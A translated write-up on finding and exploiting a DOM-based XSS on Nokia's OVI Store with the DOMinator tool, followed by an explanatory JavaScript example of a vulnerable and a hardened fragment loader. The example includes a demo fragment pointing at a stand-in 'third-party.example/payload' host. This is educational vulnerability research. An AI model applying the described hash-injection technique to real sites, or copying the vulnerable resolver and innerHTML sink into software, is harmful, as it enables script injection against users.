How to use DOMinator to discover DOM-based XSS vulnerabilities on Nokia's official website
Background
DOM-based XSS (Cross-Site Scripting) vulnerabilities are generally difficult to find. In this article, the author uses DOMinator to discover and exploit a DOM XSS on the Nokia OVI Store website; this reminds me of the Second Brother's artifact :)
Brief Introduction
The resources loaded into the DIV are all specified through location.hash. The author ran the page under DOMinator and got the following results:
The figure below shows a controllable source, location.hash, flowing into the sink XMLHttpRequest.open, through which the resource is loaded. Opening the address in Chrome gives the following console output:
Reload the following URL:
http://store.ovi.com/#/jasminder
Dominator displays the following information:
To check whether resources from a third-party website can be loaded, the author put the address of his own website into location.hash and triggered a request. The result is as follows:
The actual request is shown below. It is not sent to the author's website; the hash value is simply appended as a path on store.ovi.com:
http://store.ovi.com/jasminderapalsingh.info?fragment=1
However, the author later found that if the following request is made in Chrome:
http://store.ovi.com/#/~jasminderapalsingh.info
the browser sends the following request:
This means a request can be made to a third-party host and that host's data loaded into the page. Using this, the author hosts the payload on his own website. The final result is as follows:
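The flow described above, as an added example that is not the OVI Store's code or the author's: the source is location.hash, the sink is XMLHttpRequest.open followed by innerHTML, and beside each vulnerable step is a hardened version that resolves the fragment with the standard URL parser and refuses anything that does not stay on the site's own origin. SITE_ORIGIN, the function names and the FakeXHR stand-in are assumptions made for this example; the custom rule that let `~host` reach a third party on the OVI site is not on the page and is not reproduced here.

```javascript
// Added example, not code from the OVI Store or the write-up. It models the
// DOM-XSS flow the article describes (location.hash -> XMLHttpRequest.open ->
// innerHTML) and a hardened version of the same flow. SITE_ORIGIN, the
// function names and FakeXHR are assumptions made for this example.
const SITE_ORIGIN = "https://store.ovi.com";

// Vulnerable resolver: the fragment is trusted as a relative path. Whatever
// the URL parser resolves it to, including another origin, gets fetched.
function vulnerableResolve(hash) {
  const path = hash.replace(/^#/, "");
  return new URL(path, SITE_ORIGIN).href;
}

// Hardened resolver: resolve with the standard URL parser, then require the
// result to stay on SITE_ORIGIN and under the prefix fragments may name.
function safeResolve(hash, allowedPrefix = "/") {
  const raw = hash.replace(/^#/, "");
  let url;
  try {
    url = new URL(raw, SITE_ORIGIN);
  } catch (e) {
    return null;                                   // unparsable: refuse
  }
  if (url.origin !== SITE_ORIGIN) return null;     // off-origin: refuse
  if (!url.pathname.startsWith(allowedPrefix)) return null;
  return url.origin + url.pathname + url.search;   // drop any nested fragment
}

// Vulnerable sink: the fetched body is written as markup, so script-bearing
// HTML served by another host executes in the page's origin.
function vulnerableRender(container, body) {
  container.innerHTML = body;
}

// Hardened sink: the body is inserted as text and any markup in it is inert.
function safeRender(container, body) {
  container.textContent = body;
}

// Source-to-sink wiring. `xhr` is injected so the flow can run without a
// browser; in a page it would be `new XMLHttpRequest()`.
function loadFragment(hash, container, xhr,
                      resolve = safeResolve, render = safeRender) {
  const target = resolve(hash);
  if (target === null) return null;                // nothing is requested
  xhr.open("GET", target, true);
  xhr.onload = () => render(container, xhr.responseText);
  xhr.send();
  return target;
}

// Constructed stand-in for XMLHttpRequest: records open() and replays a
// canned body on send().
class FakeXHR {
  constructor(body) { this.responseText = body; this.opened = null; }
  open(method, url) { this.opened = { method, url }; }
  send() { if (this.onload) this.onload(); }
}

// Runs both variants on a same-origin fragment and on a protocol-relative one
// and returns what each variant would request and render.
function demo() {
  const fragments = ["#/jasminder", "#//third-party.example/payload"];
  const out = {};
  for (const frag of fragments) {
    const v = { xhr: new FakeXHR("<b>body</b>"), el: {} };
    const s = { xhr: new FakeXHR("<b>body</b>"), el: {} };
    out[frag] = {
      vulnerable: loadFragment(frag, v.el, v.xhr, vulnerableResolve, vulnerableRender),
      hardened: loadFragment(frag, s.el, s.xhr),
      vulnerableHtml: v.el.innerHTML,
      hardenedText: s.el.textContent,
    };
  }
  return out;
}
```

The check in safeResolve is applied to the URL that is actually handed to open(), after parsing, rather than to the raw fragment string; a prefix check on the raw string is what lets forms such as a protocol-relative path slip through. Keeping the sink on textContent means that even if the resolver is bypassed, fetched markup is not executed.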